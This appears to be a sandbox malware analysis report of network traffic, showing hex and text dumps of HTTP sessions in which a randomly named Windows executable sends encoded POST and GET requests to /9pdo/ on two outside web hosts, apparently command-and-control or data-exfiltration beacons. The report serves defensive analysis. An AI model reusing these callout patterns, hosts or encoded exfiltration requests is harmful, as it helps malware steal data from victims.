61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 28 41 49 4f 53 45 4f 29 20 34 2e 35 2e 33 2e 31 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a
                                                                      Data Ascii: 5f9d<!doctype html><html dir="ltr" lang="ja" prefix="og: https://ogp.me/ns#"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="HandheldFriendly" content="True"><meta name="MobileOptimized" content="320"><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="pingback" href="http://n-benriya002.com/xmlrpc.php">...[if IE]><![endif]--><link rel="stylesheet" href="http://n-benriya002.com/wp-content/themes/jstork/n-factory-css/footer.css" type="text/css" media="screen"><link rel="stylesheet" href="http://n-benriya002.com/wp-content/themes/jstork/n-factory-css/page.css" type="text/css" media="screen">... All in One SEO 4.5.3.1 - aioseo.com --><title> | </title><meta name="robots" content="noindex" /><meta name="generator" content="All in One SEO (AIOSEO) 4.5.3.1" /><script type="application/ld+j
Apr 16, 2024 17:17:36.808505058 CEST | 1289 | IN | Data Raw: 73 6f 6e 22 20 63 6c 61 73 73 3d 22 61 69 6f 73 65 6f 2d 73 63 68 65 6d 61 22 3e 0a 09 09 09 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70
                                                                      Data Ascii: son" class="aioseo-schema">{"@context":"https:\/\/schema.org","@graph":[{"@type":"BreadcrumbList","@id":"https:\/\/n-benriya002.com\/9pdo\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/n-benriya002.com\/#listItem
Apr 16, 2024 17:17:36.808522940 CEST | 1289 | IN | Data Raw: 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 5c 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 7d 5d 7d 0a 09 09 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 21 2d 2d 20
                                                                      Data Ascii: lisher":{"@id":"https:\/\/n-benriya002.com\/#organization"}}]}</script>... All in One SEO --><link rel='dns-prefetch' href='//n-benriya002.com' /><link rel='dns-prefetch' href='//ajax.googleapis.com' /><link rel='dns-prefetch' href=
Apr 16, 2024 17:17:36.808542967 CEST | 1289 | IN | Data Raw: 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e
                                                                      Data Ascii: data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n
Apr 16, 2024 17:17:36.808563948 CEST | 1289 | IN | Data Raw: 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65
                                                                      Data Ascii: ew Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e
Apr 16, 2024 17:17:36.808581114 CEST | 1289 | IN | Data Raw: 74 69 6e 67 73 29 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27
                                                                      Data Ascii: tings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !im
Apr 16, 2024 17:17:36.808603048 CEST | 1289 | IN | Data Raw: 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 30 30 64 30 38 34 3b 2d 2d 77 70 2d 2d
                                                                      Data Ascii: r--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cya
Apr 16, 2024 17:17:36.808620930 CEST | 1289 | IN | Data Raw: 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29
                                                                      Data Ascii: radient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset-
Apr 16, 2024 17:17:36.808639050 CEST | 1289 | IN | Data Raw: 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20
                                                                      Data Ascii: inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-lay
Apr 16, 2024 17:17:36.808659077 CEST | 1289 | IN | Data Raw: 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c
                                                                      Data Ascii: color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-p
Apr 16, 2024 17:17:37.085151911 CEST | 1289 | IN | Data Raw: 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d
                                                                      Data Ascii: olor{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--pr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49746 | 219.94.128.41 | 80 | 1908 | C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:17:38.720685005 CEST | 476 | OUT | GET /9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2 HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      Host: www.n-benriya002.com
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Apr 16, 2024 17:17:39.075516939 CEST | 464 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Server: nginx
                                                                      Date: Tue, 16 Apr 2024 15:17:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      X-Redirect-By: WordPress
                                                                      Location: http://n-benriya002.com/9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2


Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 81.88.63.46 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:17:44.740124941 CEST | 740 | OUT | POST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.scwspark.com
                                                                      Origin: http://www.scwspark.com
                                                                      Referer: http://www.scwspark.com/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 54 7a 6a 69 73 69 49 73 43 6f 4a 37 4a 73 39 6a 30 35 45 58 59 35 62 66 37 4d 75 37 58 63 61 53 79 62 46 68 4d 32 34 55 66 64 47 42 33 79 70 6f 45 57 2b 35 55 62 77 4c 52 7a 58 6f 6c 70 39 53 55 72 74 74 4b 6d 69 54 6d 4d 67 78 32 70 35 30 63 47 51 46 37 46 57 36 42 49 61 50 45 30 41 54 39 72 75 57 62 55 79 70 44 6b 54 6a 36 69 59 6f 59 35 56 57 6d 51 34 53 71 4f 73 36 47 62 6a 53 79 2f 61 54 2b 4a 6f 2f 4e 39 73 32 73 4a 6b 39 71 39 39 4d 47 46 32 77 6c 6b 46 76 68 2f 69 2b 6c 68 73 52 6d 70 67 5a 59 4a 5a 51 61 6e 46 51 61 68 52 58 6e 6c 53 79 30 5a 44 56 38 67 6a 38 31 77 3d 3d
                                                                      Data Ascii: edR0hF=TzjisiIsCoJ7Js9j05EXY5bf7Mu7XcaSybFhM24UfdGB3ypoEW+5UbwLRzXolp9SUrttKmiTmMgx2p50cGQF7FW6BIaPE0AT9ruWbUypDkTj6iYoY5VWmQ4SqOs6GbjSy/aT+Jo/N9s2sJk9q99MGF2wlkFvh/i+lhsRmpgZYJZQanFQahRXnlSy0ZDV8gj81w==
Apr 16, 2024 17:17:44.952512980 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:17:44 GMT
                                                                      Server: Apache
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 81.88.63.46 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:17:47.488965034 CEST | 760 | OUT | POST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.scwspark.com
                                                                      Origin: http://www.scwspark.com
                                                                      Referer: http://www.scwspark.com/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 54 7a 6a 69 73 69 49 73 43 6f 4a 37 62 39 4e 6a 33 66 4d 58 50 4a 62 65 31 73 75 37 59 38 61 65 79 62 4a 68 4d 7a 41 2b 65 76 69 42 79 6a 5a 6f 44 69 4b 35 56 62 77 4c 61 54 58 74 37 5a 39 56 55 72 52 6c 4b 6e 75 54 6d 4d 63 78 32 73 64 30 64 78 4d 61 71 46 57 38 59 59 61 4e 41 30 41 54 39 72 75 57 62 55 6d 51 44 6b 37 6a 36 79 49 6f 5a 59 56 56 76 77 34 54 36 75 73 36 4e 37 6a 57 79 2f 61 6c 2b 4e 6f 5a 4e 2b 55 32 73 49 30 39 72 73 39 50 64 31 33 37 72 45 45 52 6b 63 7a 30 38 7a 45 51 73 72 42 37 48 49 39 67 57 42 55 4b 4c 51 77 41 31 6c 32 42 70 65 4b 68 78 6a 65 31 75 31 75 79 73 38 37 71 76 66 52 38 2b 2f 47 4f 43 72 4b 30 41 54 77 3d
                                                                      Data Ascii: edR0hF=TzjisiIsCoJ7b9Nj3fMXPJbe1su7Y8aeybJhMzA+eviByjZoDiK5VbwLaTXt7Z9VUrRlKnuTmMcx2sd0dxMaqFW8YYaNA0AT9ruWbUmQDk7j6yIoZYVVvw4T6us6N7jWy/al+NoZN+U2sI09rs9Pd137rEERkcz08zEQsrB7HI9gWBUKLQwA1l2BpeKhxje1u1uys87qvfR8+/GOCrK0ATw=
Apr 16, 2024 17:17:47.702028036 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:17:47 GMT
                                                                      Server: Apache
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>


Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49749 | Destination IP: 81.88.63.46 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:17:50.239228964 CEST | 10842 | OUT | POST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10303
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.scwspark.com
                                                                      Origin: http://www.scwspark.com
                                                                      Referer: http://www.scwspark.com/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 54 7a 6a 69 73 69 49 73 43 6f 4a 37 62 39 4e 6a 33 66 4d 58 50 4a 62 65 31 73 75 37 59 38 61 65 79 62 4a 68 4d 7a 41 2b 65 76 71 42 79 31 4e 6f 45 7a 4b 35 57 62 77 4c 5a 54 58 73 37 5a 38 51 55 72 35 70 4b 6e 7a 6b 6d 4b 51 78 35 75 56 30 56 6b 34 61 7a 56 57 38 58 34 61 4d 45 30 42 5a 39 72 2f 65 62 55 32 51 44 6b 37 6a 36 30 73 6f 5a 4a 56 56 6a 51 34 53 71 4f 73 32 47 62 6a 71 79 37 4f 31 2b 4e 73 57 4e 76 30 32 76 6f 45 39 6d 2b 6c 50 41 46 33 35 6d 6b 45 5a 6b 63 2f 33 38 7a 5a 70 73 76 49 57 48 4c 68 67 63 48 39 4a 65 30 45 36 68 57 65 61 78 75 65 2b 70 53 79 45 31 32 75 6d 6c 39 58 4d 34 39 64 33 39 63 72 36 56 71 66 33 53 7a 30 35 79 6a 72 57 6f 6e 62 33 78 41 6c 68 61 4d 4d 79 41 65 44 48 64 30 67 7a 64 46 72 75 34 6d 7a 66 4c 39 42 61 70 41 53 36 41 41 6f 73 31 4f 44 63 35 59 33 46 47 65 4a 74 6a 2f 57 50 62 76 62 6c 7a 4a 4f 39 37 6e 4c 58 6e 39 66 78 37 4d 33 58 54 64 30 76 65 6a 39 51 33 54 51 6d 44 71 39 35 62 48 45 55 6c 6e 74 31 6c 56 52 67 53 45 47 71 76 34 57 70 6e 69 72 50 58 69 6b 56 63 6c 55 6d 76 37 48 55 38 4f 6f 47 33 53 6a 38 34 4b 2b 62 54 47 42 67 74 42 34 6c 76 50 4a 5a 70 37 38 4c 63 54 52 57 33 39 75 64 66 78 35 44 57 45 39 34 53 52 5a 65 64 75 72 79 4f 4f 5a 5a 65 35 55 75 59 46 4f 46 7a 6e 6a 45 77 55 46 51 4e 58 32 4b 2f 62 34 66 50 59 50 34 77 48 48 33 58 61 2b 73 48 75 72 61 47 43 6b 35 4e 67 78 4a 54 2f 6a 53 42 6e 6a 68 6a 6c 56 2f 2b 56 2b 7a 44 6d 36 36 51 63 7a 37 71 34 4e 73 58 31 78 65 45 35 44 6f 2b 34 69 51 66 76 65 35 58 34 74 6e 33 62 57 69 73 4c 74 37 6e 4d 4b 4c 73 55 36 66 33 58 64 56 58 69 75 64 44 32 59 57 51 7a 46 4c 30 2b 79 76 30 68 66 75 66 31 37 2f 48 5a 61 50 71 41 73 31 44 75 49 75 64 7a 37 74 62 42 58 6e 32 35 65 46 6e 51 39 6c 43 73 66 48 56 33 31 51 48 44 48 64 69 5a 44 56 57 62 51 55 4b 64 37 6a 5a 79 6c 6f 67 64 72 4c 6a 4b 62 35 66 78 57 46 77 51 52 66 6e 6b 52 61 4d 4f 59 43 34 62 77 56 6d 6c 56 39 73 
6f 53 35 4d 41 53 54 75 4e 54 46 46 39 55 32 6b 2f 59 76 78 6c 46 62 50 4f 43 2b 57 46 4e 31 6d 54 4e 69 53 65 57 63 69 79 67 58 66 56 41 4b 45 47 66 53 73 6b 4a 6d 4e 64 36 53 63 43 4d 31 74 39 56 74 72 4b 38 74 4d 67 71 4d 6a 74 4d 71 4a 2f 39 66 35 67 46 64 76 45 71 68 32 68 2b 77 47 77 56 31 44 59 64 39 32 63 64 62 74 4b 2b 47 51 30 42 4a 69 52 42 6a 37 4f 49 41 32 68 71 65 66 6a 55 6b 52 67 77 2f 43 6a 4a 62 4e 4c 35 61 37 39 43 4b 4b 58 71 38 62 71 46 36 4e 62 49 36 75 6e 52 43 5a 43 35 51 4a 74 73 44 54 2b 75 30 7a 4d 42 4e 58 65 30 34 2b 76 35 36 75 65 54 70 79 55 75 64 61 47 6f 31 41 6d 51 2b 34 71 2b 45 73 6b 77 71 75 4d 77 36 48 4d 75 73 73 78 37 4e 51 62 72 74 34 35 6c 6c 32 35 71 70 67 42 6a 6e 4f 4d 72 61 66 2b 5a 48 66 65 34 4b 75 74 74 73 47 52 37 77 42 57 6e 39 58 48 75 61 78 64 72 50 57 44 6f 6f 66 35 4a 4a 6b 33 64 73 4c 63 4d 69 74 76 63 78 52 74 43 50 62 33 48 74 31 2b 50 57 61 42 64 72 68 41 4a 44 6a 2b 4d 49 65 4c 47 38 5a 70 54 4e 32 49 4b 6d 6b 52 6c 52 67 47 4b 45 41 57 37 77 52 6e 4f 4f 77 6c 59 71 72 77 4f 37 34 48 75 32 56 6e 4f 4e 73 4e 46 45 7a 67 38 34 71 52 65 49 6a 69 65 75 6e 76 79 4b 58 74 6c 46 44 6f 6a 2b 58 36 4a 57 72 62 67 46 4d 7a 53 33 59 53 39 6d 4f 53 4f 50 4d 57 46 4c 2b 61 62 2f 68 6d 7a 4a 6b 6c 45 43 57 36 49 6d 55 79 34 65 6d 73 43 79 38 45 50 33 6c 50 50 50 74 42 4c 4e 31 35 33 78 31 67 70 6c 4e 6d 45 79 73 6e 64 4a 59 69 35 4d 46 41 73 6e 77 61 34 56 51 65 63 66 32 53 6c 6f 2b 48 45 64 42 53 6c 67 2f 5a 74 70 6b 50 6a 78 70 35 2b 52 46 30 73 49 4e 70 69 4c 35 49 47 6d 69 34 4f 52 48 6d 4f 4a 45 74 62 6e 43 39 6a 64 47 57 77 44 71 46 51 38 63 6e 44 45 37 65 61 78 45 75 72 72 69 72 4b 76 2f 36 64 4f 78 6c 4c 51 49 33 68 6c 70 6f 79 6a 35 37 74 61 76 48 68 32 59 44 6b 51 4e 4c 64 4a 4b 31 48 6f 44 46 62 67 42 74 4c 79 69 46 59 74 48 50 53 46 76 39 30 47 78 38 34 57 44 68 4c 4e 41 4d 76 4a 78 73 73 78 47 78 30 57 66 43 6e 43 74 2f 76 6b 79 2f 7a 68 63 4b 53 43 76 41 70 55 68 55 74 78 70 6e 37 4a 79 30 46 49 78 68 4f 
56 6c 58 46 62 4b 48 70 52 6a 32 55 6c 6b 34 53 7a 6b 35 33 76 32 57 65 67 71 31 78 39 41 78 5a 7a 41 6a 31 59 48 79 56 76 57 61 58 43 38 31 6d 6d 4b 37 51 75 31 44 51 39
                                                                      Data Ascii: edR0hF=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
Apr 16, 2024 17:17:50.453140020 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:17:50 GMT
                                                                      Server: Apache
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>


Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49750 | Destination IP: 81.88.63.46 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:17:52.988706112 CEST | 472 | OUT | GET /9pdo/?edR0hF=exLCvVI2E5RJM8xtzs4Hapiqzu/uGv/f+6d2cWgRCMmdoFVcUWazUq40e3zK6s54E+NAVH76kqhd1uh4f2sEtFmHSsWrMW9P35+QXkOmQzbQkkc9XIR6mDA=&jzuh=7Bfls2 HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      Host: www.scwspark.com
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Apr 16, 2024 17:17:53.201888084 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 16 Apr 2024 15:17:53 GMT
                                                                      Server: Apache
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
